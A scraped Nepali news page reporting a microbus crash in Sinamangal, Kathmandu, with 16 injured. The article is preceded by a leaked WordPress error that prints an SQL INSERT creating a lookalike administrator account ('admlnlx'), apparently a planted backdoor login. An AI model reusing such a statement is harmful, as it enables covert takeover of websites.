WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmrF.hPUlkixhKJABQkAoD7W0QK6Sw/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 21:40:35', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १७ असार, काठमाडौँ । सिनामंगलस्थित सूचना विभागको कार्यालय अगाडि माइक्रोबस एकापसमा ठोक्किदा दुइवटै माइक्रो बसमा सवार १६ जना घाइते भएका छन् ।
आज मंगलबार बिहान ७ बजे गौशालाबाट सिनामंगल जाँदै गरेको बा ४ ख ५१०० नम्बरको हायस र सिनामंगलबाट गौशाला जाँदै गरेको बा १ झ ९७७६ नम्बरको माइक्रो एकापसमा जुध्दा दुर्घटना भएको महानगरीय प्रहरी परिसरका प्रवक्ता एवं डिएसपी होविन्द्र बोगटीले बताए ।
दुर्घटनामा पारी घाइते हुनेहरुमा १३ जना पुरुष र ३ जना महिला रहेका छन् । घाइतेहरुमध्ये सशस्त्र प्रहरीका हवल्दार भरत खत्रीको टाउको चोट लागी गभ्मीर घाइते भएका छन् । यसैगरी, माइक्रोबस चालक हिमाल काफ्लेको अवस्था पनि चिन्ताजनक रहेको प्रहरीले जनाएको छ । घाइतेहरुको काठमाडौँ मेडिकल कलेज (केएमसी) मा उपचार भइरहेको छ ।